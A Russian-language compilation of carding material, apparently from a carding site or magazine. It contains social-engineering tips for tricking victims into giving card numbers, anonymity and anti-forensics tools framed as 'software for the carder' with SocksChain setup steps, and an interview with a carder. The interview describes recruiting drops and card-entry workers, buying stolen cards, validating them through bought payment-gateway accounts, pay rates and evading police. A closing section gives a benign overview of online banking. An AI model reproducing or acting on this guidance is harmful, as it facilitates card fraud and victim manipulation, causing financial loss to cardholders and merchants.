Чтобы жертва прониклась твоей мыслью, повторяй основные ее тезисы как можно чаще, но не переусердствуй! А то будешь только и говорить: "Дай номер креды!!!"
Старайся не просить в открытую, пусть человек поймет, что тебе нужно, и предложит сам.
Отвечая на любое резкое утверждение, жертва может легко выдать себя с потрохами, поэтому - озадачивай и озадачивай.
Базовой гипнотической способностью обладают все люди, особенно с сильной волей, поэтому, если ты пытаешься убедить человека, старайся смотреть ему в переносицу и думать, о чем говоришь.
Возраст влияет на мозг человека, например, молодежь лучше соображает вечером, а пенсионеры утром.
Многие вопросы, требующие ответа "да" или "нет", сбивают говорящего с предыдущей мысли, так что если тебя начали подозревать, используй это.
Некоторых людей можно вызвать на откровенный разговор, только показывая, что ты им не веришь.
Доказывая свою правоту, используй только факты и тезисы, которые может понять объект.
Старайся выглядеть знающим человеком в своей области, простые люди инстинктивно тянутся к более умным и знающим.
Фраза, произносимая дольше 5-6 секунд без пауз, перестает восприниматься.
Полезно придавать отдельным утверждениям форму нейтрального вопроса (например, риторического), тогда твой собеседник не ощутит давления и сможет воспринять подобную подачу как собственное мнение.
Все. Моя статья закончена, надеюсь, тебе было интересно, и ты узнал кое-что новенькое о жизни кардеров - социальных инженеров.
Софт для безопасности
Proxy
Proxifier
Proxifier - программа, позволяющая сетевым програмам не имеющим возможность работать через прокси сервера обходить это ограничение. С Proxifier вы можете работать с любыми интернет клиентами (браузеры, ftp, ICQ, IRC, Kazaa, Telnet, ssh, видео и аудио, играми, и т.п.) из сети, которая отделена от Интернета файерволом (необходим только один открытый порт). Proxifier поможет обеспечить секретность вашей информации, посылать и получать e-mail через прокси сервер, или цепь прокси серверов. Все почтовые клиенты поддерживаются (Outlook, Eudora, Netscape и другие). Программа очень полезная и, главное, работает!
офф сайт Proxifier - Bypass firewall and proxy, tunnel connections through an HTTPS and SOCKS proxy http://proxifier.com/
FreeCap
Утилита, которая позволяет прозрачно перенаправлять запросы на соединение от программ, которые не имеют родной поддержки SOCKS-прокси. Поддерживаются SOCKS протоколы v4 и v5, возможна работа через цепочку SOCKS-серверов (SOCKS Chain), а также прямые соединения на определённые порты. Полная поддержка стандартов RFC 1928, 1929, 2817 (SOCKS v4 и v5, авторизация для SOCKS5 и HTTP CONNECT).
Офф сайт: FreeCap Homepage - http://www.freecap.ru/
WideCap 1.5
Системный поксификатор . Продолжение программы FreeCap.
Офф сайт: WideCap Home http://widecap.ru/
SocksCap_2.40
Позволяет практически любой программе работать через socks5 прокси.
Настройка программы SocksCap не составит никакого труда, т.к. в ней поддерживается метод drag&drop - для добавления приложений, которым нужно разрешить выход в Интернет, достаточно просто перетащить их иконки в окно SocksCap. Настолько же просто выполнено и управление запуском программ, выходящим в Интернет через socks5 прокси: для этого достаточно всего лишь нажать правой кнопкой мыши на иконке SocksCap, находящейся в системном лотке, и выбрать необходимую программу.
Более подробно: http://sockscap.ru
SocksChain
Программа, позволяющая работать через цепочку SOCKS или HTTP-проксей для того, чтобы скрыть истинный IP-адрес. SocksChain может работать как обычный SOCKS-сервер, транслируя запросы по цепочке проксей, также он может быть использован с клиентскими программами, которые не поддерживают протокол SOCKS, но работают с одним TCP-соединением, например TELNET, HTTP, IRC... (FTP использует 2 соединения). При этом ваш IP-адрес не будет появляться в логах сервера или заголовках почтовых сообщений.
Настройка SocksChain:
1. Добавляем прокси, есть два способа:
а) Файл -> Импорт -> Ваш список прокси (взять можно из паблика любых)
б) Инструменты -> Proxy manager -> Add -> Вставляете из буфера -> OK
2. Прокси загрузили, нужно их прочекать:
Инструменты -> Proxy manager -> Test all
Если рядом с вашим прокси рисунок лампочки - значит ок, прокси рабочий, если кружок с крестиком - значит прокси мертв (ну тут все понятно, нужно искать еще).
3. Настраиваем нашу цепочку:
Service -> Modify (появляется окно, пройдемся по пунктам)
Имя: Chain
Входящий порт: 1080
Auto-creating chain: ставим галочку
Change the chain every: пишем число побольше, например, 99999999
Chain Length: тут можно указать количество прокси в вашей цепочке, чем больше прокси в вашей цепи - тем безопаснее, но и скорость заметно уменьшается, рекомендую от 1 до 3
Ниже находится маленкое окно, тут будет отображаться ваша цепочка из прокси, число в графе "Chain Length" должно соответствовать числу проксей в этом маленьком окне, т.е. если вы поставили в Chain Length "2", то и проксей в окне должно быть тоже два.
Справа список всех ваших соксов/прокси, чтобы добавить прокси в цепочку (в то маленькое окошко), кликаем на прокси (т.е. выделяем его) и нажимаем кнопку Add, если вам нужно, чтоб в цепочке было, например, 2 прокси повторяем действие. Ниже есть еще одно маленькое окошко, нам оно не интересно, оно должно быть пустым (если там есть сокс, удалите его кнопкой Delete). Нажимаем OK.
4. Инструменты -> Options -> Общие
Количество потоков: 30 (выбираете сами)
Time-out: 99999 s (выбираете сами)
Sessions time out after 99999 seconds of inactivity: (выбираете сами)
Enable connections only from localhost (127.0.0.1) (отмечаем)
Save Log to file SocksChain.log (можно отметить, можно не отмечать)
Fast disconnect (убираем галочку)
Инструменты -> Options -> Общие -> Proxy отмечаем Directly и Resolve domain names locally
Инструменты -> Options -> Upgrade отмечаем Enable Interaction with site. Нажимаем OK.
Все, SocksChain настроили.
Проверка HTTPS/SOCKS proxy серверов
Socks_checker 1.3.1
Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.
Ultra Socks Checker 1.0
Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.
Смена ID
ID-Blaster Plus
Утилита для оперативной смены Windows Product ID, UserID, Internet Explorer ID и идентификационного номера Windows Media Player. Учитывая, что эти данные потенциально небезопасны, так как являются уникальными для каждого компьтера и поэтому могут быть использованы для отслеживания действий пользователя, возможность сменить их может повысить уровень приватности.
Работает ID-Blaster Plus из системного лотка - клик, и открывается список с заранее введенными "поддельными" данными.
CCtools
v. 1.2 eng
v. 1.5 rus
Смена ID OС , смена ID IE , смена ID WMP , смена Hostname , смена имени на которое зарегистрирована ОС , смена названия компании на которое зарегистрирована ОС , смена названия процессора , смена билда системы , сохранение всех текущих ID в файл с возможностью их загрузки в программу , функции для генерации всех ID (в ручную писать не чего не придется). Сайт разработчика : http://xfq.jino-net.ru/features.html
RMOSChange 2
Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla, так, что сервер, не сможет узнать какая у вас установлена ОС, версия браузера и язык системы. Кстати, proxy скрывает только IP-адрес, но не больше. Вы можете выбрать себе Linux, SunOS, MacPC, Win 2003.
STZ Blaster
Для смены ID компа, часового пояса и т.п
Чистка системы
CCleaner
Данная утилита предназначена для чистки системного мусора. В ходе своей работы CCleaner (Crap Cleaner) ищет и удаляет временные и неиспользуемые файлы. Сюда относятся: cookies, история посещения сайтов в IE, временные файлы Интернета, строки поиска, файлы Корзины и т.д. Также поддерживается поиск временных файлов сторонних приложений: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Alcohol 120, Adobe Acrobat, WinRAR, WinAce, WinZip, GetRight, Morpheus, Download Accelerator Plus, VirtualDub, ZoneAlarm и многих других.
Evidence Eliminator 6.01 - защитный инструмент, позволяющий быстро и качественно удалить информацию, которую видеть посторонним ни к чему. Это может быть и информацией о сайтах, которые вы посетили, с какими документами работали, какие файлы были на компьютере и т.д.
Eraser
Инструмент для безопасного стирания файлов, который позволяет полностью удалять данные с жесткого диска, записывая поверх них несколько раз сложные образцы, чтобы невозможно было восстановить стертые данные. Вы можете просто перетащить файлы и/или папки на соответствующую иконку, использовать меню Windows, щелкая правой кнопкой мыши, или использовать встроенный планировщик для автоматизированного стирания неиспользуемого дискового пространства, файлов кэша и т.д.
Сайт разработчика Eraser | Eraser http://eraser.heidi.ie/
Шифруем инфу
TrueCrypt 6.3
Позволяет создавать виртуальные зашифрованные диски, которые затем могут использоваться как обычные логические диски системы. Допустимые алгоритмы шифрования: AES (256-bit key), Blowfish (448-bit key), CAST5 (128-bit key), Serpent (256-bit key), Triple DES, Twofish (256-bit key). В качестве зашифрованного хранилища ("диска") можно использовать как часть свободного места на диске, так и целиком один из имеющихся разделов жесткого диска, а также flash-карты, дискеты и другие сьемные устройства хранения данных.
Еще одна из особенностей программы - отсутствие в заголовке созданного "диска" специфической сигнатуры, характерной для других подобных программ, что делает невозможным идентифицировать TrueCrypt-диск, т.к. ни одна из частей виртуального диска не отличается от случайных данных. На домашней странице доступны исходники.
В архиве последняя версия программы и файл русификации .
Руководство начинающего: Документация по TrueCrypt на русском <-- Переводы <-- http://tech.pp.ru/trans/
Сайт разрабочика: TrueCrypt - Free Open-Source On-The-Fly Disk Encryption Software for Windows 7/Vista/XP, Mac OS X and Linux
http://www.truecrypt.org/
Secustar DriveCrypt Standard
Securstar GmbH выпустила новую финальную версию программы DriveCrypt 4.10 для шифрования как данных так и партиций HDD дисков.
На данное время это одна из самых надёжных и эффективных программ шифрования данных.
SecurStar DriveCrypt 4.1 - это эффективное средство надёжной защиты конфиденциальной информации с помощью надежных алгоритмов шифрования (1344Bit Military Strength Hard Disk Encryption) а так же DriveCrypt представляет пользователю функции стеганографии т.е умеет скрывать наличие у пользователя контейнер с секретными файлами в аудио файлах.
BestCrypt Volume Encryption
обеспечивает прозрачное шифрование всех данных, хранящихся на жёстких и съёмных устройствах, автоматически, как только данные затрагиваются Windows или любыми другими программами. В случае шифрования системного или загрузочного раздела, то BestCrypt Volume не позволит загрузиться системе без ввода необходимого пароля. Программой используются режим шифрования для дисков LRW и современные и подтвержденные криптостойкостью продвинутые или скоростные алгоритмы шифрования с максимальным ключом: AES (Rijndael) -256; Blowfish - 448; CAST - 128; GOST 28147-89 - 256; RC6 - 256; Serpent - 256 и Twofish 256-бит. Кроме ввода пароля, как самого уязвимого места программа предлагает использование аппаратных USB-ключей как высоко секретное хранилище ключей шифрования. С аппаратными USB-ключами пользователь получает два уровня защиты зашифрованных данных, так как вместе с вводом пароля необходимо подсоединить к компьютеру небольшое по размеру аппаратное USB-устройство, где хранится ключ шифрования. К тому же вся система автоматически шифруется при переходе ее в "спящий режим" и BestCrypt Volume Encryption поддерживает несколько функций спасения, позволяющие пользователю расшифровать тома, если случается серьезная поломка диска.
Софт для кардера
Когда СМИ сообщают о поимке очередного кардера, первая мысль - скорее всего, взломщик халатно отнесся к собственной безопасности. Если не хочешь оказаться на его месте, позаботься о своем анонимном существовании.
Прокси-сервер
Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-серверы.
Шлюзы чаще всего используются администраторами локальных сетей. Не давать же каждому пользователю "персональный" выход в глобальную сеть, вот и устанавливают прокси-сервер, чтобы удовлетворить за раз множество пользователей
. Но отсюда и своя особенность – ни один внешний узел сети не может установить соединение с клиентом, так как proxy-сервер не понимает, кому из пользователей предназначен этот запрос. И поэтому при работе со шлюзом возможен только один тип соединения - от клиента к серверу.Админы таким образом ограничивают пользователей - множество программ (к примеру, ICQ) не будут работать, так как требуют двухсторонней установки соединения. Зато огромный плюс - повышенная безопасность.
Второй тип proxy-серверов - кешируюший. Его использование (добровольное) значительно ускоряет загрузку страниц, особенно при соединении с сильно перегруженными серверами либо на плохой линии. Идея ясна - сервер сохраняет любые получаемые данные на своем диске (в кеше), и если запрошенный клиентом ресурс уже находится в кеше, он "отдается" уже без обращения к удаленному серверу. Схема не подходит для часто обновляющихся ресурсов, но "умные" кешируюшие прокси-серверы умеют с течением времени заново обращаться к удаленным серверам, проверять ресурс на наличие изменений и, соответственно, обновлять свой кеш.
Последний тип прокси-серверов - анонимные. Они отправляют запрос на получение данных от своего имени, не разглашая при этом IP пользователя. Они-то тебе и нужны.
Зачем это нужно
Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п. К тому же большинство программ (IE, Opera, ICQ, Reget) умеют работать с прокси-серверами. Польза от использования этой связки несомненна - никто и никогда не узнает твой истинный IP-адрес, что поможет избежать кары небесной, а также отрезать всевозможные атаки извне на твой компьютер.
Ищем прокси-серверы
Ищут прокси-серверы двумя методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.rambler.ru, www.google.com, www.yahoo.com и т.д. Заходишь на любой из них и вводишь "прокси" + "лист". Результат перед глазами: куча ссылок, разгребать которые можно всю жизнь (при наличии свободного времени), причем велика вероятность получения битых ссылок.
Плюсы: доступность и легкость использования.
Минусы: большая часть полученных результатов - прокси-серверы, не пригодные для использования. Ввиду популярности метода большинство прокси - "дохлые", их скорость оставляет желать лучшего.
Другой метод заключается в использовании софта, который специально заточен под поиск прокси в инете. Одна из подобных программ - Proxy Hunter. Все что от тебя требуется, это ввести диапазон IP-адресов для проверки, остальное программа сделает сама. Интуитивно понятный интерфейс, простота в использовании, легкость в настройке и еще множество полезных функций - все это о Proxy Hunter.
Плюсы: легкость в использовании, возможность получения наглядных результатов. Минусы: на dialup’е придется изрядно подождать
.Проверка прокси на анонимность
Собственно, самое главное - не найти анонимный прокси, а убедиться, что он действительно анонимен. Иначе доказывай потом в отдаленных местах, что ты не жираф (УК РФ читал?).
И снова варианты. Первый - опять же через веб-ресурсы, а второй - софтина Proxy Checker. Скачиваешь, устанавливаешь, и ProxyChecker готов к работе. Для простоты работы программе можно отдать на съедение запрос "IP
ort", после чего можно откинутся на спинку кресла и, попивая горячий чаек, ожидать результатов работы. Программа умная и может параллельно обрабатывать несколько запросов и дожидаться коннекта при очередном разрыве связи (диалапщики меня поймут). Удобно, что при проверке прокси на анонимность рядом с проверенными кандидатами указывается их скорость работы. В общем, золото, а не программа. Для комфортной работы требуется зарегистрировать программу, иначе она прекратит действовать по истечении 7 дней либо после 50 запусков.Насаживаем браузер на прокси
Настройка любого браузера для работы с прокси во многом одна и та же, поэтому покажу на примере популярного браузера от компании Microsoft под скромным названием Internet Explorer.
В меню "Сервис" выбери пункт "Свойство обозревателя".
В открывшемся диалоговом окне перейди к закладке "Подключение".
Нажми кнопку "Настройка локальной сети", затем отметь CheckBox "Использовать прокси-сервер" и в строке "Адрес" введи IP-адрес прокси, а в строке "Порт" - соответственно порт (обычно 80 или 8080).
Вот и все, непосильный процесс настройки закончен.
Софт
Софта существует более чем достаточно, остановимся на двух проверенных экземплярах: SurfNow Professional и Anonymity 4 Proxy.
SurfNow Professional (9x/Me/NT/2k/XP)
www.loomsoft.com
shareware
(интерфейс английский, весит ~940 Кб)
При первом запуске программа просто очаровывает юзера - верх эстетики. Главная фишка шароварки - система поиска новых прокси. Теперь тебе не нужно мучительно ходить на security-сайты, чтобы увести из-под носа товарища еще не "юзанную" прокси. SurfNow все сделает за тебя (жалко, штаны не гладит и обед не готовит - прим. ред.). Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.
Чтобы удостовериться, что прокси не "умерли", софтина сразу проверяет их на анонимность, что, согласись, очень удобно. Также разработчики не позабыли и столь нужные фичи, как смена прокси "на лету", возможность добавления в список проверенных бойцов и т.д. У программы есть ОДИН недостаток - это платность, обратись в асталависту.
Anonymity 4 Proxy (9x/Me/NT/2k/XP)
www.inetprivacy.com/a4proxy
shareware
(интерфейс английский, весит ~1077 Кб)
Этот "комбайн" появился давно, но постоянно обновляется, с каждой версией становясь все привлекательнее. Возможности аналогичны SurfNow, так что выбирай сам.
Мучительный конец
Читай на ночь УК РФ и всегда заботься о своей безопасности (не только в инете).
Ресурсы со списками прокси
www.proxychecker.ru
www.samair.ru/proxy
www.all-nettools.com/tools1.htm
www.leader.ru/secure
www.checker.freeproxy.ru/checker
www.shadowsecurity.net.ua/r/checking2.shtml
www.antichat.ru/proxy
www.pascal.sources.ru/cgi-bin/forum/YaBB.cgi?board=security
www.uinc.ru/forum/index.shtml
www.bugtraq.ru/forum
www.securitylab.ru
Проверка прокси на анонимность
Где можно купить прокси
Форумы по безопасности
Анонимайзеры
Есть в инете специальные службы – анонимайзеры. По сути, это веб-интерфейсы анонимных прокси-серверов. Заходишь на сервер анонимайзера, вводишь нужный адрес, и через некоторое время загружается нужный ресурс. При этом можешь быть уверен в своей приватности.
Анонимайзер как бы выступает посредником между тобой и просматриваемым сайтом, с которым ты соединяешься. В результате ты абсолютно анонимен - не известно ни твое местоположение, ни твой провайдер, ни твой истинный IP-адрес, одним словом, красота. Кроме этого, некоторые анонимайзеры умеют блокировать вредоносные скрипты и программы.
Все здорово, но главный недостаток анонимайзера - он существенно замедляет скорость загрузки страниц. Второй недостаток этих иногда полезных сервисов – за них надо платить. Бесплатны только "молодые" анонимайзеры, которые только раскручивают свои услуги. Некоторые анонимайзеры все-таки дают бесплатный доступ, но при этом все запросы идут с временной задержкой. У www.anonimizer.com она, к примеру, порядка 30 секунд. Еще один подобный вариант - www.safeweb.com. В принципе, их достаточно в инете, зайди на любой поисковик и введи "анонимайзер" и "anonimizer".
Отдельно могу обрадовать умельцев - в инете можно найти исходники анонимайзеров и замутить свой собственный, возможно, только для себя любимого. К примеру, исходники когда-то популярного анонимайзера Freedom Network теперь раздаются совершенно бесплатно - www.theregister.co.uk/content/55/24094.html.
Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-сервера.
Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п.
Ищут прокси-серверы двум методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.rambler.ru, www.google.com, www.yahoo.com и т.д.
Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.
Тайна бизнеса кардера
В любом бизнесе много сложностей и нюансов. Кардерский не исключение. Одной твоей целеустремленности мало для реализации столь прибыльного дела, как вещевой кардинг. Как показывает практика, для того чтобы выйти сухим из воды, сперва надо набраться опыта и лишь потом претворять свои планы в жизнь.
Я решил взять интервью у известного в узких кругах JensMiller’а. Этот человек реально знает, как построить свое дело и что для этого требуется.
JensMiller, традиционный первый вопрос: в чем суть вещевого кардинга, и почему он приобрел такую популярность?
Дело в том, что вещевой кардинг – одно из самых интересных, и в то же время доступных течений. Если человек знает, что делает, и имеет в подчинении хороших работников, его бизнес пойдет как по маслу. Главное найти подходящую жертву и следить за безопасностью.
Это в теории. А как добиться этого на практике? Что за работники будут принимать участие в бизнесе кардера?
Вообще, для того чтобы более-менее централизировать свое дело, кардеру необходимо найти опытных дропов, вбивальщиков и качественный картон. И только после этого можно выполнять какие-либо кардерские действия.
Дропы? Что-то я даже не слышал о такой профессии
. Что это за люди, и где их следует искать?Дропы – это попросту те, кто подставляет свою задницу и обналичивает чеки. Кроме того, дроп занимается принятием и сбытом товара. В идеале, такой человек должен приносить кардеру реальные бабки, ну и, соответственно, получать некоторый процент от них. Что касается поиска, этот народ ищется в основном на форумах по работе либо рекомендуются знакомыми кардерами.
Чем занимаются вбивальщики?
Вбивальщики занимаются только вбивом информации о карте в интернет-магазинах либо аукционах. Они играют огромную роль в жизни кардера, особенно когда ему лень вбивать данные самому. Это, как правило, начинающие кардеры, которые получают за свою работу довольно неплохие деньги, а также набираются опыта. Опыт же в кардинге – вещь незаменимая.
Хотелось бы знать реальную зарплату таких подчиненных.
Если вбивальщик получает некоторую сумму за каждый успешный вбив (а он подразумевает успешную сделку), ему выдается от 2 до 5$ (так плачу я). С дропом рассчитываются процентом от сделки. Когда это проверенный рекомендованный чел, ему отваливают 40-50%. Если же чувак был найден на форуме, то, пожалуй, он сам не подозревает, что является дропом. В этом случае зарплата копеечная – 5-10% от сделки. Хотя это тоже зависит от проводимой махинации.
С этим все ясно. Вернемся к третьему условию – качественному картону. Где взять валидные кредитки, и сколько они стоят?
Лучше картон добывать самому. Искать людей, которые выносят его с хостингов и инет-магазинов. Но это редко кому удается. В основном, карты продаются на буржуйских сетях типа DalNet и Efnet (большинство крупных каналов, кстати, были недавно прикрыты). Их распространяют проверенные люди, которые за счет этого живут. Картон считается качественным, если из 100 кредиток валидны не менее 95. Когда это условие нарушается, продавец обязан заменить товар.
Ты затронул очень важный вопрос – валидность карты. Как проверить положительный баланс? Существуют ли для этого свои методы?
Да, конечно. И методов довольно много. Начиная от банальной проверки с помощью порносайтов (безбожно устарело) и заканчивая X-login’ами. Это, попросту, аккаунт на сайте www.authorize.net. Поиметь туда доступ непросто – обычно аккаунты продаются в различных местах, либо подбираются наудачу. Суть этого метода заключается в том, что сервер подает запрос банку, который отвечает, имеется ли сумма на карте. Хотя я считаю, что после всяких валидейшенов картон уже не является девственным, потому как все чекалки берут себе некоторый процент от запрошенной суммы. За услуги
. Поэтому если чел, который распространяет картон, хорошо зарекомендовал себя – его товар не проверяется на валидность.В каких местах кардер меняет карты на товар? Можешь привести примеры ресурсов?
Не могу. Это закрытая информация и доступна она лишь проверенным людям. Скажу лишь одно – не стоит кардить российские магазины, это бессмысленно.
Почему? Обязательно поймают?
Если соблюдал анонимность – не поймают, но товар тебе не вышлют, это проверенный факт. Да и зачем ломать свои, когда существуют буржуйские ресурсы. Иностранцы народ наивный и охотно расстаются с деньгами.
Раз уж мы заговорили о безопасности, тогда такой вопрос. Почему кадеров ловят – из-за плохих вбивальщиков и дропов или по собственной глупости?
Философский вопрос
. Причины могут быть разными, но ловят в основном на мелочах (например, из-за захода с реального ip-адреса). Бывают и случаи, когда облажался дроп, тем самым подставив задницу кардера. Радует лишь то, что у нас в России кардинг приравнивается к обычному мошенничеству. Порой наши доблестные правоохранительные органы вообще с трудом представляют, как можно купить товар в интернете, да еще и расплатившись кредиткой. Но в любом случае, милиция пытается доказать, что кардер действительно осуществлял противозаконные махинации.Если доказывают – судят?
Да, но, как я уже сказал, кардинг – всего лишь мошенничество. За это дают условный срок с конфискацией компа. За подробностями можешь заглянуть в уголовный кодекс – найдешь там много интересного
. Кстати, судимостей за вещевой кардинг не так уж и много. В основном ловят за реал кардинг (подделка пластиковых карт). Здесь все довольно серьезно, вот, недавно взяли парней с поличным...Что скажешь насчет безопасности? Можешь привести список полезных программ, которые помогают кардеру находиться в тени?
Да, могу. Но следует оговориться, что безопасность – это не проблема кардера, а задача вбивальщика. Он пользуется стандартным набором утилит, которые помогают ему в этом деле. Вот тебе заветный список – среди программ есть и тулзы, которые юзает сам кардер.
SocksChain - создает цепочку прокси или Socks-серверов для анонимности (www.ufasoft.com/files/sockschain_setup.exe).
A4proxy - незаменимая прога при работе с HTTP проксями. Находит валидные и анонимные из огромного списка (http://antichat.ru/soft/mwg-A4Proxy252.FullRetail.zip).
PGP - Софтина для шифрования данных на диске. Как альтернативу могу предложить BestCrypt (www.jetico.com/bcrypt6.exe).
Одного софта мало. Можешь сказать, где берут анонимные Socks и Proxy-сервера? Или это тоже закрытая информация?
Покупают. Для этого существуют свои тематические ресурсы. Например, www.proxyboss.net. Вообще достать подобные вещи не проблема – нужно лишь иметь аккаунт на сайте, либо знать стоящих людей, которые всегда подкинут тебе мегабайтовый листик прокси-серверов
.А теперь настало время для “интимного” вопроса. Какой заработок имеет кардер за месяц хорошей работы?
Как повезет. Все зависит от сделок, которые были успешно реализованы за промежуток времени. В основном совершается от десятка до сотни прибыльных сделок. При этом, если говорить о средней прибыли, кардер может получать от $1000 до $20000.
Неплохо! Признаться, даже мне захотелось заняться таким прибыльным делом
.Не все так просто. За такие деньги и проблем себе можешь нажить. В Сети существовали и будут существовать крысы, которые так и норовят кинуть честного кардера на бабки. Я говорю в основном о дропах, они не всегда честный народ. Хотя может кинуть кто угодно – продавец картона, проксиков и даже вбивальщик. Я уже ничему не удивлюсь.
А как определить, что тебя собираются кинуть? Или наверняка сказать невозможно?
Конечно, никак. Как и в реальной жизни, человек не знает, кто его может кинуть
. Это человеческий фактор. Как правило, кидалы заносятся в черный список, который просматривается всеми кардерами. В нем можно найти ник, аську и координаты дропа (хотя, что мешает чуваку сменить ник?). Для этого, перед приемом на работу, у чувака просят скан паспорта. Эту процедуру проводят также для устрашения – человек дважды подумает насчет кидалова, если его попросят отсканировать документ.Забавно, но кардеры сами иногда кидают дропов. Обещают им золотые горы, а затем забивают на них по полной. При этом наивный буржуин даже не способен ответить на кидалово.
Буржуин? Разве дропы не из России?
Нет. Как раз наоборот. Дропы, как правило, живут в USA и других странах. Наши ушлые представители могут кинуть кардера, как два байта переслать. Поэтому, если хочешь, чтобы твой бизнес процветал – учи иностранный язык, он тебе весьма пригодится
.Как гласит народная мудрость - главное вовремя остановиться. Актуально ли это для кардера?
Несомненно! Ловят именно из-за того, что кардер перегибает палку. Сначала он не может нарадоваться $1000, а потом ему становится мало $50 000. В итоге, после очередной крупной сделки – плачевный итог. Поэтому не стоит жадничать, и тогда все будет ок.
Какие ресурсы ты бы посоветовал для изучения кардерского мастерства? Есть ли такие вообще?
На этом сайте есть все, что касается кардинга, не побоюсь этого слова. Там можно найти замечательные статьи, форум, где ежедневно обсуждаются проблемы кардинга, а также листы доверенных кардеров и кидал. Эта информация весьма полезна. Что примечательно, по кардингу пишут только в России и ближних странах СНГ. Это связано с тем, что за границей немного другие законы, поэтому кардерство там не прижилось.
На этой оптимистической ноте и завершим наше интервью. И последний вопрос - что бы ты хотел пожелать читателем журнала? Выбрать легкий, на первый взгляд, способ заработать на жизнь или не рисковать?
Этот путь далеко не легкий. Если кто привык воровать, то такая работа ему будет по душе. А когда жизнь только начинается, мой тебе совет - не лезь в это грязное дело, а заработай в другом месте. На худой конец, будь просто вбивальщиком, не больше.
Спасибо за замечательные ответы. Я думаю, теперь читатель поймет, что кардерство – действительно опасный бизнес, хотя и довольно прибыльный. От себя замечу, что я полностью согласен с автором – если тебе чуждо воровство, не стоит заниматься этим делом. Наживешь меньше проблем на свою пятую точку.
Теперь ты понимаешь всю сложность бизнеса кардера. Начать и поддерживать свое дело очень сложно. Постоянно приходится сотрудничать с разными людьми и сталкиваться с кидалами. Но, несмотря на это, кардинг процветает и будет популярен до тех пор, пока не введут новые законы, которые будут жестоко пресекать подобную деятельность.
Автор выражает благодарность JensMiller ([email protected]) за интервью. Этот человек познал непростые азы кардинга, а начинал как большинство кардеров – с работы вбивальщиком.
Управляем банковским аккаунтом в онлайне
Компьютерные системы очень плотно вошли в нашу жизнь, так, что мы даже не задумываемся о них. Так же плавно в мир вошли электронные системы платежей, интернет-магазины, кредитные карты и многое-многое другое. Например, электронные банки. Несмотря на то, что это очень прогрессивное изобретение, которое день ото дня становится все популярнее (на западе), немногие знают о нем хоть что-то. Давай попробуем это исправить.
Что такое on-line banking
Онлайн-банкинг, он же электронный (e-banking) и домашний (home banking), это удаленное управление банковскими счетами посредством телефона (телебанкинг), персонального компьютера и интернета (интернет-банкинг) или портативных устройств (мобильный банкинг). Телебанкинг и мобильный банкинг мы пока отложим в сторону. А я расскажу тебе о типах on-line банков.
Существуют так называемые виртуальные банки - работающие с клиентами исключительно через интернет, и, в отличие от традиционных банков, не располагающие филиальной сетью. И есть традиционные банки, которые используют возможности интернета для удаленного банковского обслуживания своих клиентов. То есть помимо обычных своих сервисов, банк использует в качестве дополнительной услуги интернет-управление аккаунтами вкладчиков. Такой банк называется интернет-банком.
Ты спросишь, в чем же преимущество интернет-банков? В том, что где бы ты ни находился и что бы ни делал, имея под рукой компьютер с доступом в интернет, ты легко можешь управлять своими капиталами. Около 35 процентов европейцев, пользующихся интернетом, так и делают. В России дела обстоят немного по-другому: так как число пользователей интернета составляет всего 17 процентов от общего населения страны, то такой услугой, как онлайн-банкинг, пользуется лишь один из двухсот сорока семи юзеров. При этом он является юридическим лицом и разбирается в программном обеспечении на уровне «выше среднего». В России уже есть 10 крупных банков, предоставляющих своим клиентам такую услугу. Согласно информации, полученной с сайта Интер Финанс, в скором будущем откроются еще два, а значит - спрос на эти услуги все-таки есть.
И еще немного об удобствах и возможностях on-line banking’а. Список стандартных операций с аккаунтом через интернет, предлагаемых банками пользователям, почти везде одинаков. Это, естественно, просмотр текущего баланса и состояния счета, перевод и пополнение денежных средств. Пополнить счет можно как наличными, так и через банкомат, воспользовавшись пластиковой картой. Можно и закрыть счет. Вот только зачем?
Существуют и бонусные возможности - например, заполнив специальный договор, можно получить в банке кредит. И это еще далеко не все.Очевидно, что при пользовании on-line banking’ом тебе не придется бегать в банк и стоять в очереди, чтобы получить деньги или пополнить счет. Все гениальное просто. Так что, не отрывая пятой точки от кресла, можно произвести практически все те же операции, что и при посещении банка. Поэтому всякие умные люди, вроде Бори Березовского, используют систему интернет-банкинга. Прикинь, как пришлось бы заморачиваться бедняге, посещая несколько банков в разных частях мира, при том, что в некоторые страны его не пускают, а в некоторых еще и арестовать могут
.Кстати, некоторые банки предоставляют эту услугу абсолютно бесплатно, достаточно написать заявление.
Теперь еще о бонусах. У каждого банка есть как свои заморочки, так и свои достоинства. Так как я не смог объездить и обзвонить все банки, предоставляющие услуги онлайн-доступа (я рассматриваю только русские онлайн-банки), я позволил себе воспользоваться информацией из интернета.
Оказалось, что в некоторых банках имеет место реферальная система (как, например, в старой доброй спедии). Если ты привел, допустим, в Гута-Банк одного реферала, то получаешь 2 месяца бесплатного обслуживания. А если ты еще и старый клиент, то твой друг тоже получит 3 месяца фо фри. Также Гута-Банк позволяет тебе БЕСПЛАТНО открыть карточку Visa Electron.
В некоторых банках возможно установить лимит денежного перевода. Заметь, что переводы через интернет-банкинг считаются безналичными, и, соответственно, налогом с продаж не облагаются, что является реальным шансом сэкономить свои кровные.
